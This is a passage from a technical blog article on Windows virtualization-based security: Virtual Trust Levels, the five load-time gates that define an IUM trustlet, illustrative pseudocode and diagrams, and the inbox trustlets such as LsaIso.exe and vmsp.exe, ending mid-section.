&lt;p&gt;On 29 July 2015 Microsoft shipped Windows 10 build 10240 [@wiki-win10-history]. Two new ideas shipped with it. The first was Hyper-V&apos;s hypervisor running &lt;em&gt;underneath&lt;/em&gt; the NT kernel even on a laptop, not just on a server hosting virtual machines [@wiki-hyperv]. The second was a separate kernel running alongside the NT kernel, at a different Virtual Trust Level. Together those two ideas produce a substrate where the long-time equation &quot;SYSTEM kernel write primitive equals every secret in user-mode memory&quot; is no longer true.&lt;/p&gt;

A hypervisor-managed privilege axis added on top of x86&apos;s existing ring 0 / ring 3 split. Each VTL has its own kernel mode and its own user mode. Higher VTLs can read and write lower-VTL memory; lower VTLs cannot read or write higher-VTL memory at all. The Hyper-V Top-Level Functional Specification reserves up to 16 VTLs; the current Hyper-V implementation defines `#define HV_NUM_VTLS 2` [@msdocs-vsm].
&lt;p&gt;The Hyper-V Top-Level Functional Specification states the rule directly: &lt;em&gt;&quot;VSM achieves and maintains isolation through Virtual Trust Levels (VTLs)... Architecturally, up to 16 levels of VTLs are supported; however a hypervisor may choose to implement fewer than 16 VTL&apos;s. Currently, only two VTLs are implemented&quot;&lt;/em&gt; [@msdocs-vsm]. The NT kernel runs in VTL0 ring 0; user-mode applications run in VTL0 ring 3. The &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel&quot; rel=&quot;noopener&quot;&gt;Secure Kernel&lt;/a&gt; runs in VTL1 ring 0; trustlets run in VTL1 ring 3. Each VTL transition takes the CPU through a VMEXIT and back, with VMCS save and restore on each crossing [@quarkslab-virtual-journey].The architectural cap of sixteen VTLs is in the published specification but is not deployed. Stocking the unused slots would require both hypervisor changes and a new design for who manages the additional kernel images. The two-VTL design is the entire shipped product.&lt;/p&gt;
&lt;p&gt;Quarkslab&apos;s reverse-engineering team put the practical consequence in one sentence in their IUM-debugging writeup: &lt;em&gt;&quot;VTL0 is the Normal World, where the traditional kernel-mode and user-mode code run in ring 0 and ring 3, respectively. On top of that, a new world appears: VTL1 is the privileged Secure World, where the Secure Kernel runs in ring 0, and a limited number of IUM processes run in ring 3. Code running in VTL0, even in ring 0, cannot access the higher-privileged VTL1&quot;&lt;/em&gt; [@quarkslab-debug-ium].&lt;/p&gt;
&lt;p&gt;That sentence is the architectural fact the whole article rests on. The hypervisor configures each guest physical page&apos;s permissions on a per-VTL basis using the CPU&apos;s Second Level Address Translation tables. A page can be readable from VTL0 and VTL1, readable from VTL1 only, or readable from neither.On Intel hardware, the per-VTL permissions are implemented with Extended Page Tables (EPT); on AMD they use Nested Page Tables (NPT). The hypervisor keeps the per-VTL EPT/NPT entries in its own memory, not in the guest&apos;s.&lt;/p&gt;

The hardware mechanism (Intel EPT, AMD NPT) that lets a hypervisor define page-level read, write, and execute permissions independent of the guest&apos;s own page tables. With VTLs, SLAT entries are per-VTL: a page&apos;s permissions when the CPU is executing VTL1 code can differ from the same page&apos;s permissions when the CPU is executing VTL0 code. A SYSTEM-privilege VTL0 attacker who edits the NT kernel&apos;s page tables cannot change the VTL1-side permissions, because those live in hypervisor-managed structures that VTL0 page-table writes do not touch.

flowchart LR
    subgraph VTL0[&quot;VTL0 (Normal World)&quot;]
        ring3_0[&quot;Ring 3: lsass.exe, vmwp.exe, user apps&quot;]
        ring0_0[&quot;Ring 0: NT kernel + signed drivers&quot;]
        ring3_0 --&amp;gt; ring0_0
    end
    subgraph VTL1[&quot;VTL1 (Secure World)&quot;]
        ring3_1[&quot;Ring 3: LsaIso.exe, vmsp.exe, trustlets&quot;]
        ring0_1[&quot;Ring 0: Secure Kernel (securekernel.exe)&quot;]
        ring3_1 --&amp;gt; ring0_1
    end
    VTL0 -. ALPC over agent ALPC port .-&amp;gt; VTL1
    VTL1 -. read VTL0 memory .-&amp;gt; VTL0
    hv[&quot;Hyper-V hypervisor: per-VTL SLAT permissions&quot;]
    VTL0 --&amp;gt; hv
    VTL1 --&amp;gt; hv
&lt;p&gt;The VTL hierarchy is not symmetric. VTL1 code can read VTL0 memory; that is how a trustlet can dispatch the contents of an &lt;code&gt;lsass.exe&lt;/code&gt; RPC request the moment after VTL0 wrote it. VTL0 code cannot read VTL1 memory under any condition the hypervisor permits. A kernel write primitive in VTL0 lets the attacker corrupt the NT kernel&apos;s data structures, modify drivers, and walk every VTL0 process&apos;s pages. The attacker can do every one of those things and not be one byte closer to the contents of &lt;code&gt;LsaIso.exe&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s IUM documentation at Windows 10 RTM named two trustlets explicitly: &lt;strong&gt;Trustlet ID 0 = the Secure Kernel Process&lt;/strong&gt; (hosts Device Guard and Hypervisor-protected Code Integrity policy decisions), and &lt;strong&gt;Trustlet ID 1 = &lt;code&gt;LSAISO.EXE&lt;/code&gt;&lt;/strong&gt; (Credential Guard&apos;s isolated LSA, holding NTLM hashes and Kerberos Ticket-Granting Tickets out of VTL0 reach). Two more (IDs 2 and 3, covered in §6) also shipped on the RTM image and were enumerated a week later by Ionescu&apos;s Black Hat reverse-engineering [@msdocs-ium] [@ionescu-bh2015]. Microsoft Learn&apos;s IUM page introduces the vocabulary the rest of this piece will use:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Trustlets (also known as trusted processes, secure processes, or IUM processes) are programs running as IUM processes in VSM... With VSM enabled, the Local Security Authority (LSASS) environment runs as a trustlet.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A week after Windows 10 shipped, on 5 August 2015, Alex Ionescu walked into a Black Hat USA briefing room in Mandalay Bay and reverse-engineered the entire thing in front of an audience [@ionescu-bh2015-infocondb]. His talk, &quot;Battle of the SKM and IUM: How Windows 10 Rewrites OS Architecture,&quot; is the canonical first public account of the trustlet model and the source from which Microsoft&apos;s own later documentation borrows terminology one for one [@ionescu-bh2015]. Almost every concrete fact in the next section -- the syscall allow-list, the EKUs, the &lt;code&gt;.tpolicy&lt;/code&gt; section, the Trustlet Instance GUID -- traces back to that single deck.&lt;/p&gt;
&lt;p&gt;Now we know what world a trustlet lives in. What architecturally &lt;em&gt;is&lt;/em&gt; one?&lt;/p&gt;
&lt;h2&gt;5. The Five Gates&lt;/h2&gt;
&lt;p&gt;A trustlet is not a special process &lt;em&gt;class&lt;/em&gt; the way a Protected Process is. It is an ordinary Portable Executable binary that has been loaded under five very specific conditions. Walk through them once and you will be able to recognise a trustlet in a &lt;code&gt;dumpbin /headers&lt;/code&gt; listing. The status is mechanical, not categorical. Chapter 9 of &lt;em&gt;Windows Internals, Seventh Edition, Part 2&lt;/em&gt; (Allievi, Russinovich, Ionescu, Solomon) covers the same architecture from the kernel-team side as a reference complement to Ionescu&apos;s BH2015 reverse-engineering [@windows-internals-7e-pt2].&lt;/p&gt;

A Windows user-mode process that runs in Virtual Trust Level 1 user mode (ring 3 of the Secure World), scheduled by the Secure Kernel and isolated from VTL0 by Hyper-V&apos;s per-VTL SLAT enforcement. A binary becomes a trustlet only if it satisfies five very specific conditions: a process attribute, two signing EKUs at Signature Level 12, a `.tpolicy` PE section containing `s_IumPolicyMetadata`, a Trustlet Instance GUID bound at runtime, and a stripped-down loader path. Trustlets are sometimes also called &quot;trusted processes,&quot; &quot;secure processes,&quot; or &quot;IUM processes&quot; [@msdocs-ium].

The user-mode environment of Virtual Trust Level 1. IUM is, structurally, ring 3 of VTL1. Its inhabitants are trustlets; its kernel is the Secure Kernel; its system-call surface is approximately one-tenth of NT&apos;s. Quarkslab&apos;s IUM-debugging writeup describes IUM as the place where *&quot;a limited number of IUM processes run in ring 3&quot;* of VTL1; Microsoft&apos;s Win32 documentation describes the same architectural placement with different wording [@quarkslab-debug-ium] [@msdocs-ium].
&lt;h3&gt;Gate 1: the process attribute&lt;/h3&gt;
&lt;p&gt;VTL0 user-mode code cannot call &lt;code&gt;CreateProcess&lt;/code&gt; and produce a trustlet. The Win32 API does not expose the necessary primitive. A trustlet is born via a direct &lt;code&gt;NtCreateUserProcess&lt;/code&gt; syscall that carries a &lt;code&gt;PsAttributeSecureProcess&lt;/code&gt; attribute with a 64-bit Trustlet ID. Only callers that already live in VTL1, or callers in VTL0 that hold a specific brokering capability, can request that attribute and have the Secure Kernel honour it [@ionescu-bh2015].&lt;/p&gt;
&lt;p&gt;This is intentional. The Win32 layering is one of the surfaces an attacker can compromise, so the trustlet boot path bypasses it. There is no &quot;trustlet via shell&quot; -- not for an administrator, not for SYSTEM, not for the Secure Kernel itself other than through the documented internal path.&lt;/p&gt;
&lt;h3&gt;Gate 2: two EKUs at Signature Level 12&lt;/h3&gt;
&lt;p&gt;The binary must be signed with a certificate chain that contains two specific Enhanced Key Usage identifiers, and the resulting Signing Level must be 12 or higher. From Ionescu&apos;s BH2015 deck (correcting a typo in the slide): &lt;em&gt;&quot;They must have a Signature Level of 12... This means they must have the Windows System Component Verification EKU (1.3.6.1.4.1.311.10.3.6)... They must have the IUM EKU 1.3.6.1.4.1.311.10.3.37&quot;&lt;/em&gt; [@ionescu-bh2015].&lt;/p&gt;

An X.509 certificate extension that restricts which purposes a certificate can be used for. An EKU is an object identifier (OID); a code-signing certificate that claims an OID of `1.3.6.1.4.1.311.10.3.6` is asserting it is valid for the &quot;Windows System Component Verification&quot; purpose. The Windows code-integrity subsystem (`ci.dll`) checks the requested EKU against the actual certificate at signature time and refuses to load the image if the EKU is missing or the certificate is not chained to a trusted root [@ionescu-ppp3].
&lt;p&gt;Both EKUs are required. The Windows System Component Verification EKU establishes the binary as a Microsoft-signed Windows component. The IUM EKU asserts the binary&apos;s &lt;em&gt;intent&lt;/em&gt; to load as a trustlet. A PPL EKU may sit on top, layering the PPL signer-level check on the trustlet check, but the two-EKU minimum is what Signing Level 12 enforces.The system-component EKU check is skipped when both Test Signing is enabled and the local machine trusts the Microsoft Test Root. That is the exact attack class Ionescu names verbatim in the BH2015 deck: &quot;compromise the platform via Test Signing&quot; disables the signing gate that defines trustlet identity.&lt;/p&gt;
&lt;h3&gt;Gate 3: the &lt;code&gt;.tpolicy&lt;/code&gt; section and &lt;code&gt;s_IumPolicyMetadata&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Every trustlet image must contain a PE section named &lt;code&gt;.tpolicy&lt;/code&gt; marked &lt;code&gt;IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ&lt;/code&gt;. The section must export the symbol &lt;code&gt;s_IumPolicyMetadata&lt;/code&gt;, a structure with three required components: a version byte set to 1, a 64-bit Trustlet ID that must match the one the process attribute requested, and a per-trustlet policy table containing entries for ETW (event tracing), debug permissions, crash-dump key release, and other trustlet-specific runtime knobs [@ionescu-bh2015].&lt;/p&gt;
&lt;p&gt;The Secure Kernel parses this section at load time via an internal routine the deck names &lt;code&gt;SkpspFindPolicy&lt;/code&gt;. A binary with no &lt;code&gt;.tpolicy&lt;/code&gt; section, or with one whose Trustlet ID disagrees with the process-attribute Trustlet ID, or whose version byte is anything other than 1, fails the gate. The Secure Kernel does not &quot;infer&quot; a trustlet identity; it reads it out of the binary the attacker would have had to sign.&lt;/p&gt;
&lt;h3&gt;Gate 4: the Trustlet Instance GUID&lt;/h3&gt;
&lt;p&gt;Once gates 1-3 pass, the trustlet calls a secure-service routine the deck names &lt;code&gt;IumSetTrustletInstance&lt;/code&gt;, identified by secure-call ordinal &lt;code&gt;0x80000001&lt;/code&gt;. That routine binds the running process to a Trustlet Instance GUID, the runtime identity by which the Secure Kernel discriminates one instance of a trustlet from another. Hyper-V partition GUIDs flow into this identifier for the vTPM trustlets, so that the secrets a partition&apos;s vTPM holds are scoped to that partition&apos;s Instance GUID.&lt;/p&gt;
&lt;p&gt;The same Instance GUID can be shared across distinct Trustlet IDs. That is the architectural primitive Microsoft uses for trustlet-to-trustlet authentication: the host-side Hyper-V vTPM (&lt;code&gt;vmsp.exe&lt;/code&gt;, Trustlet ID 2) and the vTPM provisioning trustlet (ID 3) cooperate on a single partition&apos;s secrets by sharing the partition&apos;s Instance GUID. The Secure Kernel&apos;s &lt;code&gt;SkCapabilities&lt;/code&gt; table hardcodes which Trustlet IDs are permitted to invoke which secure-storage operations against an Instance GUID; for the 2015-era IUM surface, the only ID-discriminated rules are &lt;code&gt;CheckByTrustletId 2&lt;/code&gt; for &lt;code&gt;SecureStorageGet&lt;/code&gt; and &lt;code&gt;CheckByTrustletId 3&lt;/code&gt; for &lt;code&gt;SecureStorageSet&lt;/code&gt; [@ionescu-bh2015].&lt;/p&gt;
&lt;h3&gt;Gate 5: the stripped-down loader&lt;/h3&gt;
&lt;p&gt;A trustlet&apos;s image loader is not the standard NT loader. The Secure Kernel routes trustlet loads through a path the deck names &lt;code&gt;LdrpIsSecureProcess&lt;/code&gt;, which skips an unusually long list of features. Application Verifier hooks: skipped. Image File Execution Options registry checks: skipped. SxS / Fusion DLL redirection: skipped. The CSRSS connection ordinary NT processes establish during startup: skipped (the &lt;code&gt;BASE_STATIC_SERVER_DATA&lt;/code&gt; structure CSRSS would normally hand back is fabricated locally on the trustlet&apos;s heap so dependent calls do not crash). Safer, AuthZ, Software Restriction Policies: all skipped. Any DLL load triggered from VTL0: refused.&lt;/p&gt;
&lt;p&gt;The result is a loader path with no attack surface against VTL0 environment variables, no susceptibility to NT&apos;s normal &quot;load this DLL instead&quot; knobs, and no opportunity for the user&apos;s CSRSS process to inject anything into the trustlet&apos;s address space. The system-call surface available inside the trustlet is restricted to roughly fifty allowed entries. Ionescu&apos;s deck states the count verbatim: &lt;em&gt;&quot;Only 48 system calls are currently allowed from IUM Trustlets&quot;&lt;/em&gt; [@ionescu-bh2015].&lt;/p&gt;

sequenceDiagram
    participant Caller as Caller (VTL1 or brokered VTL0)
    participant NT as NtCreateUserProcess
    participant CI as ci.dll (CipMincryptToSigningLevel)
    participant SK as Secure Kernel (SkpspFindPolicy)
    participant Ldr as LdrpIsSecureProcess
    participant Iset as IumSetTrustletInstance
    Caller-&amp;gt;&amp;gt;NT: Create with PsAttributeSecureProcess + Trustlet ID
    NT-&amp;gt;&amp;gt;CI: Verify EKUs System Component plus IUM and Signing Level ge 12
    CI--&amp;gt;&amp;gt;NT: Pass or fail
    NT-&amp;gt;&amp;gt;SK: Parse .tpolicy, validate s_IumPolicyMetadata
    SK--&amp;gt;&amp;gt;NT: Pass or fail
    NT-&amp;gt;&amp;gt;Ldr: Strip down loader and deny VTL0-triggered DLL loads
    Ldr--&amp;gt;&amp;gt;NT: Image mapped under IUM rules
    NT-&amp;gt;&amp;gt;Iset: Bind Trustlet Instance GUID
    Iset--&amp;gt;&amp;gt;NT: Trustlet alive in VTL1
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Gate&lt;/th&gt;
&lt;th&gt;What it checks&lt;/th&gt;
&lt;th&gt;Where it lives&lt;/th&gt;
&lt;th&gt;Failure outcome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1. Process attribute&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PsAttributeSecureProcess&lt;/code&gt; with 64-bit Trustlet ID, requested via &lt;code&gt;NtCreateUserProcess&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;NT kernel boot path&lt;/td&gt;
&lt;td&gt;Normal NT process; no IUM bit ever set [@ionescu-bh2015]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2. EKUs + Signing Level&lt;/td&gt;
&lt;td&gt;Windows System Component EKU (&lt;code&gt;1.3.6.1.4.1.311.10.3.6&lt;/code&gt;) AND IUM EKU (&lt;code&gt;1.3.6.1.4.1.311.10.3.37&lt;/code&gt;); Signing Level &amp;gt;= 12&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ci.dll&lt;/code&gt; integrity check, &lt;code&gt;CipMincryptToSigningLevel&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Load refused; no trustlet [@ionescu-ppp3] [@ionescu-bh2015]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3. &lt;code&gt;.tpolicy&lt;/code&gt; + &lt;code&gt;s_IumPolicyMetadata&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;PE section with version 1, matching Trustlet ID, and per-trustlet policy entries&lt;/td&gt;
&lt;td&gt;Secure Kernel &lt;code&gt;SkpspFindPolicy&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Load refused; no trustlet [@ionescu-bh2015]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4. Trustlet Instance GUID&lt;/td&gt;
&lt;td&gt;&lt;code&gt;IumSetTrustletInstance&lt;/code&gt; secure-call ordinal &lt;code&gt;0x80000001&lt;/code&gt;; per-partition scoping for vTPM&lt;/td&gt;
&lt;td&gt;Secure Kernel runtime&lt;/td&gt;
&lt;td&gt;Process exists but cannot bind to per-instance secret storage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5. Loader strip-down&lt;/td&gt;
&lt;td&gt;Skip Application Verifier, IFEO, SxS, CSRSS, Safer, AuthZ, SRP; deny VTL0-triggered DLL loads&lt;/td&gt;
&lt;td&gt;NT &lt;code&gt;LdrpIsSecureProcess&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Normal NT loader runs; image loads but is not isolated&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The pseudocode below walks each gate in order against a fake binary descriptor. It is not a loader, it is not an exploit, and it is not a security tool. It is a teaching aid: if you can read it, you can read the trustlet load path.&lt;/p&gt;
&lt;p&gt;{`
// Trustlet load-time gate check (educational pseudocode).
// Inspired by Ionescu BH2015 reverse-engineering of Win10 RTM (2015).
// Not a real loader; not a security tool.&lt;/p&gt;
&lt;p&gt;const WINDOWS_SYSTEM_COMPONENT_EKU = &quot;1.3.6.1.4.1.311.10.3.6&quot;;
const IUM_EKU                      = &quot;1.3.6.1.4.1.311.10.3.37&quot;;
const MIN_SIGNING_LEVEL            = 12; // &quot;Windows&quot;&lt;/p&gt;
&lt;p&gt;function loadTrustlet(bin) {
  // Gate 1: process attribute
  if (!bin.attr || !bin.attr.PsAttributeSecureProcess) {
    return &quot;fail at gate 1: no PsAttributeSecureProcess attribute&quot;;
  }
  const requestedId = bin.attr.PsAttributeSecureProcess.trustletId;&lt;/p&gt;
&lt;p&gt;  // Gate 2: two EKUs at Signing Level 12+
  const ekus = (bin.cert &amp;amp;&amp;amp; bin.cert.ekus) || [];
  if (!ekus.includes(WINDOWS_SYSTEM_COMPONENT_EKU)) {
    return &quot;fail at gate 2: missing Windows System Component EKU&quot;;
  }
  if (!ekus.includes(IUM_EKU)) {
    return &quot;fail at gate 2: missing IUM EKU&quot;;
  }
  if ((bin.cert.signingLevel || 0) &amp;lt; MIN_SIGNING_LEVEL) {
    return &quot;fail at gate 2: signing level below 12&quot;;
  }&lt;/p&gt;
&lt;p&gt;  // Gate 3: .tpolicy section with s_IumPolicyMetadata
  const tpol = bin.sections &amp;amp;&amp;amp; bin.sections[&quot;.tpolicy&quot;];
  if (!tpol || !tpol.exports || !tpol.exports.s_IumPolicyMetadata) {
    return &quot;fail at gate 3: no .tpolicy section with s_IumPolicyMetadata&quot;;
  }
  const meta = tpol.exports.s_IumPolicyMetadata;
  if (meta.version !== 1 || meta.trustletId !== requestedId) {
    return &quot;fail at gate 3: malformed or mismatched s_IumPolicyMetadata&quot;;
  }&lt;/p&gt;
&lt;p&gt;  // Gate 4: Trustlet Instance GUID (bound at runtime via IumSetTrustletInstance)
  const instance = bin.runtime &amp;amp;&amp;amp; bin.runtime.instanceGuid;
  if (!instance) {
    return &quot;fail at gate 4: no Trustlet Instance GUID bound&quot;;
  }&lt;/p&gt;
&lt;p&gt;  // Gate 5: stripped-down loader (skip Application Verifier, IFEO, SxS, CSRSS,
  // Safer, AuthZ, SRP; deny VTL0-triggered DLL loads).
  // We don&apos;t simulate the loader here; we just refuse VTL0-injected DLL loads.
  if (bin.loaderTriggers &amp;amp;&amp;amp; bin.loaderTriggers.fromVtl0) {
    return &quot;fail at gate 5: VTL0-triggered DLL load denied&quot;;
  }&lt;/p&gt;
&lt;p&gt;  return &quot;trustlet loaded: id=&quot; + requestedId
       + &quot; instance=&quot; + instance;
}&lt;/p&gt;
&lt;p&gt;// Smoke test.
const sample = {
  attr:    { PsAttributeSecureProcess: { trustletId: 1 } },
  cert:    { ekus: [
    &quot;1.3.6.1.4.1.311.10.3.6&quot;,
    &quot;1.3.6.1.4.1.311.10.3.37&quot;,
  ], signingLevel: 12 },
  sections: { &quot;.tpolicy&quot;: { exports: {
    s_IumPolicyMetadata: { version: 1, trustletId: 1 },
  } } },
  runtime: { instanceGuid: &quot;&quot; },
  loaderTriggers: { fromVtl0: false },
};
console.log(loadTrustlet(sample));
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A trustlet is what passes all five gates. There is no other definition. Status is mechanical, not categorical: it is what the Secure Kernel&apos;s load path produces when a properly signed binary with a properly formed &lt;code&gt;.tpolicy&lt;/code&gt; section calls &lt;code&gt;NtCreateUserProcess&lt;/code&gt; with a proper secure-process attribute.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;All five gates pass. The binary is now a trustlet. It is running in VTL1 user mode. The hypervisor refuses to map its pages into VTL0. Now what does it do? Who does it talk to?&lt;/p&gt;
&lt;h2&gt;6. The Inbox Roster&lt;/h2&gt;
&lt;p&gt;Five gates. Pass them all and you become a trustlet. Microsoft passes them on behalf of -- as of mid-2026 -- this list.&lt;/p&gt;
&lt;h3&gt;The agent / trustlet pattern&lt;/h3&gt;
&lt;p&gt;Before the roster, the pattern. Almost every shipping trustlet has a partner: an agent process in VTL0 that does the high-volume work of integrating with the rest of the operating system, and the trustlet itself in VTL1 holding the secret material. The two talk over an Advanced Local Procedure Call port whose server end is hosted by the trustlet.&lt;/p&gt;

A Windows inter-process communication primitive optimised for fast, fixed-size message exchange between processes on the same machine. The NT kernel hosts ALPC ports as named kernel objects (e.g., `\RPC Control\LSA_ISO_RPC_SERVER`); clients open a port and exchange messages with the server. For trustlets, the ALPC server runs inside the trustlet in VTL1; clients in VTL0 send requests, the Secure Kernel marshals the request across the VTL boundary, and the trustlet returns a result back to VTL0. The hash never leaves VTL1; the request and response do.

flowchart LR
    NetClient[Network or local client]
    Agent[&quot;lsass.exe (VTL0 agent)&lt;br /&gt;protocol parsing&lt;br /&gt;session state&lt;br /&gt;network I/O&quot;]
    SK[&quot;Secure Kernel&lt;br /&gt;(VTL1 ring 0)&lt;br /&gt;marshals secure calls&quot;]
    Trustlet[&quot;LsaIso.exe (VTL1 trustlet)&lt;br /&gt;NTLM hashes&lt;br /&gt;Kerberos TGTs&lt;br /&gt;EncryptData / DecryptData&quot;]
    NetClient --&amp;gt;|&quot;network protocol&quot;| Agent
    Agent --&amp;gt;|&quot;ALPC: LSA_ISO_RPC_SERVER&quot;| SK
    SK --&amp;gt;|&quot;IUM Base API&quot;| Trustlet
    Trustlet --&amp;gt;|&quot;opaque blob&quot;| SK
    SK --&amp;gt; Agent
&lt;p&gt;The roster below names the agent for each trustlet where Microsoft has published one. Where the agent is not publicly named, the row says so.&lt;/p&gt;
&lt;h3&gt;Trustlet ID 0 -- the Secure Kernel Process&lt;/h3&gt;
&lt;p&gt;The first inhabitant of VTL1 user mode. Hosts Device Guard and Hypervisor-protected Code Integrity policy decisions. Architecturally close to a daemon: it does not service external clients; it provides services the Secure Kernel itself relies on for policy decisions about whether a given image is permitted to load in VTL0 [@ionescu-bh2015].&lt;/p&gt;
&lt;h3&gt;Trustlet ID 1 -- &lt;code&gt;LsaIso.exe&lt;/code&gt; (Credential Guard)&lt;/h3&gt;
&lt;p&gt;The canonical trustlet. Holds NTLM hashes and Kerberos Ticket-Granting Tickets. Its agent in VTL0 is &lt;code&gt;lsass.exe&lt;/code&gt;, the Local Security Authority Subsystem Service that has held those secrets directly for every version of Windows NT until 2015. The ALPC port name is &lt;code&gt;LSA_ISO_RPC_SERVER&lt;/code&gt;. The IUM-side API the trustlet exposes is narrow: &lt;code&gt;EncryptData&lt;/code&gt; and &lt;code&gt;DecryptData&lt;/code&gt; on opaque blobs, plus a handful of internal management operations [@msdocs-credential-guard].&lt;/p&gt;
&lt;p&gt;The Microsoft Learn explanation is the verbatim public account:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;With Credential Guard enabled, the LSA process in the operating system talks to a component called the isolated LSA process that stores and protects those secrets, LSAIso.exe. Data stored by the isolated LSA process is protected using VBS and isn&apos;t accessible to the rest of the operating system. LSA uses remote procedure calls to communicate with the isolated LSA process [@msdocs-credential-guard].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A VTL0 caller -- including SYSTEM-in-the-NT-kernel -- can ask the trustlet to encrypt a freshly supplied credential or to authenticate a freshly received challenge. It cannot ask the trustlet to expose the underlying NTLM hash. The hash never leaves VTL1. That is the entire point.&lt;/p&gt;
&lt;h3&gt;Trustlet ID 2 -- &lt;code&gt;vmsp.exe&lt;/code&gt; (Hyper-V vTPM, host side)&lt;/h3&gt;
&lt;p&gt;The Hyper-V &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c&quot; rel=&quot;noopener&quot;&gt;Virtual Trusted Platform Module&lt;/a&gt; on the host side. One &lt;code&gt;vmsp.exe&lt;/code&gt; instance per guest partition; the agent is &lt;code&gt;vmwp.exe&lt;/code&gt;, the Hyper-V Virtual Machine Worker Process for that partition. The Instance GUID is the partition&apos;s GUID, so that the keys a partition&apos;s vTPM holds are scoped to that partition and that partition only. Storage primitives include a Mailbox primitive (protected by a per-instance Security Cookie) and a Secure Storage primitive that produces Ingress and Egress blobs encrypted with per-Instance IDK material [@ionescu-bh2015] [@msdocs-guarded-fabric].&lt;/p&gt;
&lt;p&gt;Shielded VMs on Windows Server 2016 and later consume &lt;code&gt;vmsp.exe&lt;/code&gt;. A shielded VM, per Microsoft Learn, &lt;em&gt;&quot;has a virtual TPM, is encrypted using BitLocker, and can run only on healthy and approved hosts in the fabric&quot;&lt;/em&gt; [@msdocs-guarded-fabric]. The vTPM keys live in the host&apos;s &lt;code&gt;vmsp.exe&lt;/code&gt; trustlet; the &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-&quot; rel=&quot;noopener&quot;&gt;BitLocker volume master key&lt;/a&gt; in the guest is sealed against that vTPM; and a SYSTEM-privilege NT-kernel write primitive on the host cannot read the partition&apos;s vTPM secrets even though the host can otherwise reach the partition&apos;s memory.&lt;/p&gt;
&lt;h3&gt;Trustlet ID 3 -- vTPM provisioning trustlet&lt;/h3&gt;
&lt;p&gt;Pushes initial secrets into a partition&apos;s Instance GUID at vTPM creation time. The Secure Kernel&apos;s &lt;code&gt;SkCapabilities&lt;/code&gt; array hardcodes &lt;code&gt;CheckByTrustletId 2&lt;/code&gt; for &lt;code&gt;SecureStorageGet&lt;/code&gt; and &lt;code&gt;CheckByTrustletId 3&lt;/code&gt; for &lt;code&gt;SecureStorageSet&lt;/code&gt;; those are the only Trustlet-ID-checked secure-storage operations in the 2015-era IUM secure-call surface [@ionescu-bh2015]. The pair of trustlets cooperates on the same Instance GUID so the provisioning trustlet writes and &lt;code&gt;vmsp.exe&lt;/code&gt; reads, with the Secure Kernel enforcing that no other trustlet can do either.&lt;/p&gt;
&lt;h3&gt;Enhanced Sign-in Security (ESS) biometric matching component (Windows 11+)&lt;/h3&gt;
&lt;p&gt;Microsoft Learn documents the architectural placement of Windows Hello&apos;s facial-recognition algorithm verbatim:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;When ESS is enabled, the face algorithm is protected using VBS to isolate it from the rest of Windows. The hypervisor is used to specify and protect memory regions, so that they can only be accessed by processes running in VBS. The hypervisor allows the face camera to write to these memory regions providing an isolated pathway... Sensors that support ESS have a certificate embedded during manufacturing [@msdocs-ess].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The page also documents the certificate chain that authenticates the camera to the matcher and the match-on-sensor requirement for fingerprint readers under ESS. Microsoft does &lt;em&gt;not&lt;/em&gt; publicly name the binary that hosts the face algorithm, and it does not publicly assign that binary a Trustlet ID. The architectural placement is a trustlet. The naming is not on the record.&lt;/p&gt;
&lt;h3&gt;Administrator Protection / Adminless issuer (Windows 11, rolling out 2025-26)&lt;/h3&gt;
&lt;p&gt;In October 2025 Microsoft shipped a preview of Administrator Protection in KB5067036 [@kb5067036] and reverted the rollout in the same update note [@msdocs-admin-protection]. The Microsoft Learn page describes the security model:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Once authorized, Windows uses a hidden, system-generated, profile-separated user account to create an isolated admin token. This token is issued to the requesting process and is destroyed once the process ends, ensuring that admin privileges don&apos;t persist. Administrator protection introduces a new security boundary with support to fix any reported security bugs [@msdocs-admin-protection].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The implementation surface that issues those tokens is not publicly named. The architectural family resemblance to a trustlet is strong, and the &quot;new security boundary with support to fix any reported security bugs&quot; line is the formal commitment Microsoft makes for VBS-isolated components. Whether the issuer is a trustlet, a VBS Enclave, or a separately isolated VTL0 process is, as of mid-2026, not on the public record.&lt;/p&gt;
&lt;h3&gt;Third-party VBS Enclaves (Windows 11 24H2 and later)&lt;/h3&gt;
&lt;p&gt;For the first time since 2015, the trustlet primitive is exposed to third-party developers. A VBS Enclave is a DLL signed with a Trusted Signing certificate and loaded into a VTL1 enclave region of a host process via &lt;code&gt;CreateEnclave&lt;/code&gt; and &lt;code&gt;CallEnclave&lt;/code&gt;. The OS support is narrow:&lt;/p&gt;
&lt;blockquote&gt;
